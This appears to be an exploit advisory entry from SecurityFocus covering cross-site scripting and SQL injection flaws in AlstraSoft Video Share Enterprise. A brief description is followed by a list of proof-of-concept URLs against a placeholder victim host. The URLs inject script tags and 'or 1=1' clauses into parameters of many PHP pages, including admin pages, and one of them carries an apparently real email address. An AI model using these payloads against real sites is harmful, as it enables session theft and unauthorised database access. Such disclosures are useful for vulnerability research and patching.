source: https://www.securityfocus.com/bid/25019/info AlstraSoft Video Share Enterprise is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting vulnerabilities and multiple SQL-injection vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, access or modify data, or exploit latent vulnerabilities in the underlying database. http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+ sent+"> http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc"> http://[Victim]/videoshare/signup.php? next=upload"> http://[Victim]/videoshare/search_result.php? search_id=ghgdgdfd"> http://[Victim]/videoshare/view_video.php? viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr http://[Victim]/videoshare/video.php? category=tf">&viewtype= http://[Victim]/videoshare/video.php? page=5"> http://[Victim]/videoshare/compose.php? receiver=demo"> http://[Victim]/videoshare/groups.php? b=ra&catgy=Recently%20Added"> http://[Victim]/videoshare/siteadmin/ channels.php?a=Search&channelid=&channelname=%22 %3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search http://[Victim]/videoshare/siteadmin/muser.php? email=sanam11sa@hotmail.com&uname=GLAMOROUS"> http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1 http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1 http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1 http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1 http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1 http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1 http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1 http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1